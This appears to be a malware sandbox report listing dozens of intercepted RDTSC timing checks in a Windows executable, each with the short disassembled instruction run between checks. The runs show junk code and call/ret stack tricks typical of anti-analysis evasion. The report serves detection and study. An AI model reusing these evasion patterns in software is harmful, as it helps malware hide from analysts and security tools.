              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0FFC second address: 8E1002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1002 second address: 8E1010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE52CBFFE22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1010 second address: 8E1016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1016 second address: 8E101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E101A second address: 8E1022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1022 second address: 8E1026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5476 second address: 8E547A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E45DA second address: 8E45F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FE52CBFFE16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E45F6 second address: 8E4600 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4600 second address: 8E4604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4604 second address: 8E4608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5730 second address: 8E5735 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5735 second address: 8E5757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FE52CC9523Ch 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FE52CC95236h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5757 second address: 8E5778 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 je 00007FE52CBFFE24h 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007FE52CBFFE16h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5D77 second address: 8B5D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EAC13 second address: 8EAC1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EAC1A second address: 8EAC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95247h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EADCC second address: 8EADDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FE52CBFFE16h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB30B second address: 8EB33E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FE52CC95246h 0x00000008 jo 00007FE52CC95236h 0x0000000e pop edx 0x0000000f js 00007FE52CC95238h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jng 00007FE52CC95270h 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB33E second address: 8EB368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE23h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007FE52CBFFE1Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECEFD second address: 8ECF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECF03 second address: 8ECF46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jo 00007FE52CBFFE34h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECF46 second address: 8ECF57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECF57 second address: 8ECF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED309 second address: 8ED30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED30F second address: 8ED313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED3DA second address: 8ED3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED3DE second address: 8ED3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDA42 second address: 8EDA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDA48 second address: 8EDA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDB03 second address: 8EDB20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FE52CC95236h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f movzx esi, bx 0x00000012 mov dword ptr [ebp+122D2F32h], ebx 0x00000018 push eax 0x00000019 pushad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE12F second address: 8EE13A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FE52CBFFE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE624 second address: 8EE629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE629 second address: 8EE62E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE62E second address: 8EE63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0216 second address: 8F026C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007FE52CBFFE16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov si, B464h 0x00000013 push 00000000h 0x00000015 jo 00007FE52CBFFE20h 0x0000001b jmp 00007FE52CBFFE1Ah 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007FE52CBFFE18h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr [ebp+12480C3Ch], edx 0x00000042 mov dword ptr [ebp+122D17A7h], esi 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F026C second address: 8F0270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF93E second address: 8EF959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0270 second address: 8F0276 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0276 second address: 8F027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F22AC second address: 8F234D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE52CC95242h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FE52CC95238h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D2BB2h], ebx 0x00000032 or esi, dword ptr [ebp+122D182Bh] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007FE52CC95238h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 mov esi, 2A205DE0h 0x00000059 push 00000000h 0x0000005b mov esi, ebx 0x0000005d xchg eax, ebx 0x0000005e jmp 00007FE52CC95247h 0x00000063 push eax 0x00000064 push eax 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2C9C second address: 8F2CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3687 second address: 8F36FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FE52CC95238h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jmp 00007FE52CC95247h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2F39h], ebx 0x00000031 xchg eax, ebx 0x00000032 jmp 00007FE52CC95240h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FE52CC95247h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F420C second address: 8F421E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FE52CBFFE18h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F421E second address: 8F4225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4A5D second address: 8F4A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA258 second address: 8FA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA25C second address: 8FA266 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2BD second address: 8FB2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2C1 second address: 8FB2C7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA3C9 second address: 8FA3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC95247h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2C7 second address: 8FB2DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FE52CBFFE1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2DA second address: 8FB2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC117 second address: 8FC128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jng 00007FE52CBFFE20h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC128 second address: 8FC19A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+1244E99Bh], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FE52CC95238h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 jmp 00007FE52CC9523Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FE52CC95238h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or edi, dword ptr [ebp+122D354Bh] 0x00000050 sub dword ptr [ebp+122D188Bh], esi 0x00000056 mov dword ptr [ebp+122D2581h], ebx 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pushad 0x00000061 popad 0x00000062 pop edi 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC19A second address: 8FC1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCFFF second address: 8FD070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D3972h] 0x0000000f mov di, A5E0h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FE52CC95238h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FE52CC95238h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov ebx, edx 0x0000004d xchg eax, esi 0x0000004e jmp 00007FE52CC95244h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC39A second address: 8FC39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC39F second address: 8FC3A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD070 second address: 8FD076 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD076 second address: 8FD080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FE52CC95236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD21C second address: 8FD220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE396 second address: 8FE3AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901326 second address: 901360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FE52CBFFE2Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE52CBFFE22h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9004C4 second address: 9004E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE52CC9523Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jl 00007FE52CC95236h 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2946 second address: 8B2951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904711 second address: 904726 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FE52CC95236h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904726 second address: 904792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FE52CBFFE18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor edi, 2BE466CEh 0x0000002b push 00000000h 0x0000002d xor ebx, dword ptr [ebp+122D1C5Ah] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FE52CBFFE18h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7756 second address: 8B775A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B775A second address: 8B778D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE52CBFFE16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE52CBFFE1Ah 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jnl 00007FE52CBFFE16h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f jp 00007FE52CBFFE18h 0x00000025 push esi 0x00000026 pop esi 0x00000027 pushad 0x00000028 push edx 0x00000029 pop edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90576C second address: 905792 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FE52CC95236h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FE52CC9523Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007FE52CC95236h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9058B1 second address: 9058B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9058B5 second address: 9058CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9058CF second address: 9058D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908FF8 second address: 908FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908015 second address: 90801C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90801C second address: 9080B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 add dword ptr [ebp+12480C3Ch], ecx 0x0000000d mov bx, ax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FE52CC95238h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov di, EB63h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007FE52CC95240h 0x00000041 mov eax, dword ptr [ebp+122D0901h] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007FE52CC95238h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 push FFFFFFFFh 0x00000063 mov edi, dword ptr [ebp+122D3A1Eh] 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jo 00007FE52CC95244h 0x00000072 jmp 00007FE52CC9523Eh 0x00000077 rdtsc
